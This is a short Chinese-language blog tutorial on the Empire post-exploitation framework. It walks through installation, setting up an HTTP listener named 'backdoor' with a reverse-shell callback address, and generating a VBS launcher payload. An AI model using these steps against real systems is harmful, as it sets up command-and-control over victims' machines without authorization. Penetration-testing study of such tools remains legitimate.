记Empire工具后渗透的使用

  • A+
所属分类:安全博客
摘要

Empire 我随便摘抄了一段过来. 一说内网,我们基本都是在第一时间想到Metasploit,因为有Metasploit这么强大的存在我们很少能注意到别的工具。Metasploit的牛逼之处在于他不管是信息收集,渗透,后渗透,木马,社工,你能想到的他基本都可以做到,杀人越货必备啊。但是Empire就是针对内网渗透,针对Powershell,我们在内网渗透中肯能用到的powershell脚本,全部都在Empire的框架中了,更是域渗透神器!但是关于Empire的资料,国内真的是少的可怜,就那么几篇。做安全,不得不佩服国外的大牛们!

Empire

介绍

我随便摘抄了一段过来. 一说内网,我们基本都是在第一时间想到Metasploit,因为有Metasploit这么强大的存在我们很少能注意到别的工具。Metasploit的牛逼之处在于他不管是信息收集,渗透,后渗透,木马,社工,你能想到的他基本都可以做到,杀人越货必备啊。但是Empire就是针对内网渗透,针对Powershell,我们在内网渗透中肯能用到的powershell脚本,全部都在Empire的框架中了,更是域渗透神器!但是关于Empire的资料,国内真的是少的可怜,就那么几篇。做安全,不得不佩服国外的大牛们!

项目地址

https://github.com/EmpireProject/Empire 

安装

进入setup目录执行install.sh文件即可开始安装

./install.sh 

设置监听

ps:这里记录一些简单记录使用,用过msf都可以很快上手,set的时候注意大写
Empire的listeners就是MSF的监听。就是创建一个监听载荷。Agents相当于MSF的会话sessions。
启动empire

./empire 

启动后如下
记Empire工具后渗透的使用

输入命令进入监听

listeners 

选择监听方法

uselistener http 

设置监听名

set Name backdoor 

设置shell回弹地址

set Host http://192.168.0.21:4444 

设置相应的端口

set Port 4444 

开始监听

execute 

生成payload

输入main命令回到主菜单

main 

输入usestager后两下tab查看可以生成的payload

usestager 

生成vbs的payload

usestager windows/launcher_vbs 

设置监听

set Listener backdoor 

生成payload(默认tmp目录下)

execute 

参考

后渗透测试神器Empire的详解
内网工具学习之Empire后渗透

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

记Empire工具后渗透的使用

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2019-09-18

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: